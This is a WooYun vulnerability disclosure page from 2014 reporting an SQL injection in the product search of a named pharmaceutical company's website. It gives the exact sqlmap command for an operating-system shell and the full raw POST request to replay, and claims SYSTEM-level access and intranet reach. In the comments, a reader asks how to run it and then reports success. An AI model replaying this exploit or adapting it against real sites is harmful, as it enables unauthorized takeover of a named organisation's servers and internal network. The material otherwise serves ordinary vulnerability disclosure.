当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-084717

漏洞标题:华润三九某处dba权限注入(已获取系统权限shell)

相关厂商:华润三九

漏洞作者: 白非白

提交时间:2014-11-26 09:56

修复时间:2014-12-01 09:58

公开时间:2014-12-01 09:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-26: 细节已通知厂商并且等待厂商处理中
2014-12-01: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

内网尽在掌握,可惜不喜欢玩内网怎么破?

详细说明:

注射点在搜索功能:http://web.999.com.cn/sj/pro.aspx?tiao=1

11.jpg


sqlmap参数如下设置可获取system权限shell一枚,执行任意命令:

sqlmap.py -r 999.txt --os-shell


999.txt内容(请注意代码区换号符问题,复现时复制粘贴请保持http协议正确):

POST /sj/pro.aspx?tiao=1 HTTP/1.1
Host: web.999.com.cn
Proxy-Connection: keep-alive
Content-Length: 3347
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://web.999.com.cn
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 UBrowser/3.1.1644.34 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://web.999.com.cn/sj/pro.aspx?tiao=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=vucq3piurlfvow45aifti1rb
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJNDc3OTgyOTkwD2QWAmYPZBYCAgMPZBYGAgUPFgIeC18hSXRlbUNvdW50AgwWGGYPZBYCZg8VAhFwcm8uYXNweD9UeXBlaWQ9Ng%2FooaXnm4rosIPnkIboja9kAgEPZBYCZg8VAhFwcm8uYXNweD9UeXBlaWQ9OAnmipfnlJ%2FntKBkAgIPZBYCZg8VAhJwcm8uYXNweD9UeXBlaWQ9MTIP5Lit6I2v5rOo5bCE5YmCZAIDD2QWAmYPFQIRcHJvLmFzcHg%2FVHlwZWlkPTIP5oSf5YaS5q2i5ZKz6I2vZAIED2QWAmYPFQIRcHJvLmFzcHg%2FVHlwZWlkPTMP6IKg6IOD5raI5YyW6I2vZAIFD2QWAmYPFQIRcHJvLmFzcHg%2FVHlwZWlkPTQP56Wb6YKq5q2j5L2T6I2vZAIGD2QWAmYPFQIRcHJvLmFzcHg%2FVHlwZWlkPTUP55qu6IKk5aSW55So6I2vZAIHD2QWAmYPFQIRcHJvLmFzcHg%2FVHlwZWlkPTcM5aaH56eR55So6I2vZAIID2QWAmYPFQIRcHJvLmFzcHg%2FVHlwZWlkPTkM5oqX6IK%2F55ik6I2vZAIJD2QWAmYPFQIScHJvLmFzcHg%2FVHlwZWlkPTEwDOmFjeaWuemil%2BeykmQCCg9kFgJmDxUCEnByby5hc3B4P1R5cGVpZD0xMQ%2FmuIXng63op6Pmr5Loja9kAgsPZBYCZg8VAhJwcm8uYXNweD9UeXBlaWQ9MTMG5YW25LuWZAIHD2QWCAIBD2QWBAIBDw8WAh4EVGV4dAUM6I2v5ZOB5pCc57SiZGQCAw8WAh8AZmQCAw8PFgIfAQUM6I2v5ZOB5pCc57SiZGQCBQ8WAh8AZmQCBw8PFgYeCFBhZ2VTaXplAgoeC1JlY29yZGNvdW50Zh4QQ3VycmVudFBhZ2VJbmRleAIBZGQCCQ8WAh8BBaELPGRpdiBjbGFzcz0ibGluazEiPjx1bD48bGk%2BPGEgaHJlZj0iaHR0cDovLzk5OWdtbC5jb20uY24vIiAgIHRhcmdldD0iX2JsYW5rIj45OTnmhJ%2FlhpLngbU8L2E%2BPC9saT48L3VsPjx1bD48bGk%2BPGEgaHJlZj0iaHR0cDovL3d3dy45OTlweXAuY29tLyIgICB0YXJnZXQ9Il9ibGFuayI%2B55qu6IKk6I2v5a625pePPC9hPjwvbGk%2BPC91bD48dWw%2BPGxpPjxhIGhyZWY9Imh0dHA6Ly93d3cuOTk5LmNvbS5jbiIgICB0YXJnZXQ9Il9ibGFuayI%2B5Y2O5ram5LiJ5Lmd5Yy76I2v6IKh5Lu95pyJ6ZmQ5YWs5Y%2B4PC9hPjwvbGk%2BPC91bD48dWw%2BPGxpPjxhIGhyZWY9Imh0dHA6Ly85OTlwaGFybS5jb20uY24vcHJvLmFzcCIgICB0YXJnZXQ9Il9ibGFuayI%2B5rex5Zyz5LiJ5Lmd5Lit5Yy76I2v5oqV6LWE5Y%2BR5bGV5pyJ6ZmQ5YWs5Y%2B4PC9hPjwvbGk%2BPC91bD48dWw%2BPGxpPjxhIGhyZWY9Imh0dHA6Ly93d3cuMzl6eS5jb20iICAgdGFyZ2V0PSJfYmxhbmsiPua3seWcs%2BW4guS4ieS5neeOsOS7o%2BS4reiNr%2BaciemZkOWFrOWPuDwvYT48L2xpPjwvdWw%2BPHVsPjxsaT48YSBocmVmPSJodHRwOi8vd3d3Lmdvc3VuY2hpbmEuY29tIiAgIHRhcmdldD0iX2JsYW5rIj7mt7HlnLPkuZ3mlrDoja%2FkuJrmnInpmZDlhazlj7g8L2E%2BPC9saT48L3VsPjwvZGl2PjxkaXYgY2xhc3M9ImxpbmsxIj48dWw%2BPGxpPjxhIGhyZWY9Imh0dHA6Ly93d3cuYWhqYy5jbiIgICB0YXJnZXQ9Il9ibGFuayI%2B5a6J5b696YeR6J%2B%2B55Sf5YyW6IKh5Lu95pyJ6ZmQ5YWs5Y%2B4PC9hPjwvbGk%2BPC91bD48dWw%2BPGxpPjxhIGhyZWY9Imh0dHA6Ly93d3cueWE5OTkuY29tLyIgICB0YXJnZXQ9Il9ibGFuayI%2B6ZuF5a6J5LiJ5Lmd6I2v5Lia5pyJ6ZmQ5YWs5Y%2B4PC9hPjwvbGk%2BPC91bD48dWw%2BPGxpPjxhIGhyZWY9Imh0dHA6Ly93d3cuOTk5YmouY29tIiAgIHRhcmdldD0iX2JsYW5rIj7ljJfkuqzkuInkuZ3oja%2FkuJrmnInpmZDlhazlj7g8L2E%2BPC9saT48L3VsPjx1bD48bGk%2BPGEgaHJlZj0iaHR0cDovL3d3dy45OTlqeC5jb20uY24iICAgdGFyZ2V0PSJfYmxhbmsiPuaxn%2Bilv%2BS4ieS5neiNr%2BS4muaciemZkOWFrOWPuDwvYT48L2xpPjwvdWw%2BPHVsPjxsaT48YSBocmVmPSJodHRwOi8vc2RzYW5qaXV5eS5iaXp0eC5jbi8iICAgdGFyZ2V0PSJfYmxhbmsiPuWxseS4nOS4ieS5neiNr%2BS4muaciemZkOWFrOWPuDwvYT48L2xpPjwvdWw%2BPHVsPjxsaT48YSBocmVmPSJodHRwOi8vd3d3Ljk5OW5rLmNuIiAgIHRhcmdldD0iX2JsYW5rIj7muZbljZfkuInkuZ3ljZflvIDliLboja%2FmnInpmZDlhazlj7g8L2E%2BPC9saT48L3VsPjwvZGl2PjxkaXYgY2xhc3M9ImxpbmsxIj48dWw%2BPGxpPjxhIGhyZWY9Imh0dHA6Ly93d3cuOTk5bmluZXN0YXIuY29tIiAgIHRhcmdldD0iX2JsYW5rIj7mt7HlnLPkuZ3mmJ%2FljbDliLfljIXoo4Xpm4blm6LmnInpmZDlhazlj7g8L2E%2BPC9saT48L3VsPjwvZGl2PmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFEmN0bDAwJEltYWdlQnV0dG9uMXMgz3N2dpdbmh6Fz3HjmyrXPj%2Fb&__EVENTVALIDATION=%2FwEWAwKMpsmMBgK33sGJAQLssvLQAxoyWrcK7rrKvmTSrKtmUzqiYq4L&ctl00%24TextBox1=%E4%B8%89%E4%B9%9D*&ctl00%24ImageButton1.x=19&ctl00%24ImageButton1.y=10


使用sqlmap需要注意的地方:

1.jpg

漏洞证明:

system shell:

2.jpg


3.jpg


内网信息:

4.jpg


都不用操心提权的事了。

修复方案:

应该懂。

版权声明:转载请注明来源 白非白@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-12-01 09:58

厂商回复:

最新状态:

2014-12-11:在跟进


漏洞评价:

评论

  1. 2015-04-07 20:57 | harbour_bin ( 普通白帽子 | Rank:358 漏洞数:47 | 向TOP200进军!)

    你好,先请教一下 -r 999.txt 这个文件应该放在什么文件夹下面,我是一个新手,谢谢

  2. 2015-04-07 22:32 | 白非白 ( 普通白帽子 | Rank:447 漏洞数:60 | ♫ Freedom - Anthony Hamilton ♫)

    @harbour_bin 直接-r 999.txt的话就要放在sqlmap.py同一个目录。或者你可以指定具体路径,那就随便你放在哪里了。比如 -r c:\python27\123\999.txt。都可以的

  3. 2015-04-08 08:38 | harbour_bin ( 普通白帽子 | Rank:358 漏洞数:47 | 向TOP200进军!)

    @白非白 成功了,谢谢